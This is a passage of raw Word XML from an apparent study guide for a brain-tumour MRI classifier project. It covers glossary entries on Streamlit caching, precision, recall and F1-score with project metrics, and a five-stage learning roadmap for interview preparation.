        </w:rPr>
        <w:t xml:space="preserve"> for thermal overlays.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>17. In-Memory Caching (`@st.cache_resource`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A Streamlit decorator that caches global resources (such as database connections or 12 MB deep learning models) across user interactions and browser sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* Decorated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>load_neuroscan_model()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to achieve sub-second response times.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>18. Precision</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The proportion of positive identifications that were actually correct: $\frac{TP}{TP + FP}$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*Project Example:* Glioma precision was $92.81\%$, meaning when the model diagnosed a glioma, it was right over 92% of the time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>19. Recall (Sensitivity)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The proportion of actual positives that were correctly identified: $\frac{TP}{TP + FN}$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*Project Example:* Healthy brain recall was $99.0\%$, meaning 396 out of 400 healthy scans were correctly identified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>20. F1-Score</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The harmonic mean of Precision and Recall: $2 \cdot \frac{</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ext{Precision} \cdot </w:t>
        <w:tab/>
        <w:t>ext{Recall}}{</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ext{Precision} + </w:t>
        <w:tab/>
        <w:t>ext{Recall}}$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*Project Example:* Weighted average F1-score across all 1,600 test scans was $0.8566$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>16.2 Step-by-Step Learning &amp; Mastering Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>If you want to understand every part of this project deeply and explain it with mastery in an interview, follow this 5-stage roadmap:</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line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[ Stage 1: Data Understanding &amp; Hygiene ] (Day 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Read: notebooks/01_data_exploration.ipynb</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Master: Image loading, class distributions, resolution checks, and MD5 hash auditing.</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Milestone: Be able to explain why train/test leakage destroys clinical AI models.</w:t>
              <w:br/>
              <w:t xml:space="preserve">                     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                     ▼</w:t>
              <w:br/>
              <w:t>[ Stage 2: Deep Learning &amp; Transfer Learning ] (Day 2-3)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Read: notebooks/02_model_training.ipynb (Cells 0 to 8)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Master: tf.data pipeline (cache, shuffle, prefetch), MobileNetV2 architecture,</w:t>
              <w:br/>
              <w:t xml:space="preserve">             depthwise separable convolutions, GAP, BatchNorm, and Dropout.</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Milestone: Explain why base_model.trainable was frozen initially.</w:t>
              <w:br/>
              <w:t xml:space="preserve">                     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                     ▼</w:t>
              <w:br/>
              <w:t>[ Stage 3: Empirical Validation &amp; Retraining ] (Day 4)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Read: notebooks/02_model_training.ipynb (Cells 9 to 15)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Master: Classification reports, Confusion Matrices, and the empirical jump</w:t>
              <w:br/>
              <w:t xml:space="preserve">             from 82.19% to 86.12% when training on 100% of the dataset.</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Milestone: Explain why meningioma recall surged by 15%.</w:t>
              <w:br/>
              <w:t xml:space="preserve">                     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                     ▼</w:t>
              <w:br/>
              <w:t>[ Stage 4: Explainable AI with Grad-CAM ] (Day 5)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Read: app.py (compute_gradcam and create_superimposed_overlay)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Master: tf.GradientTape backpropagation, channel importance pooling, ReLU,</w:t>
              <w:br/>
              <w:t xml:space="preserve">             and OpenCV Jet colormap alpha blending.</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Milestone: Derive the Grad-CAM alpha_k equation on a whiteboard.</w:t>
              <w:br/>
              <w:t xml:space="preserve">                     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                     ▼</w:t>
              <w:br/>
              <w:t>[ Stage 5: Production Deployment &amp; Interview Mastery ] (Day 6-7)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Read: app.py (Streamlit UI layout, caching decorators) &amp; README.md</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Master: All 42 interview questions in Chapter 14.</w:t>
              <w:br/>
              <w:t xml:space="preserve">   • Milestone: Deliver the 2-minute project walkthrough aloud without notes!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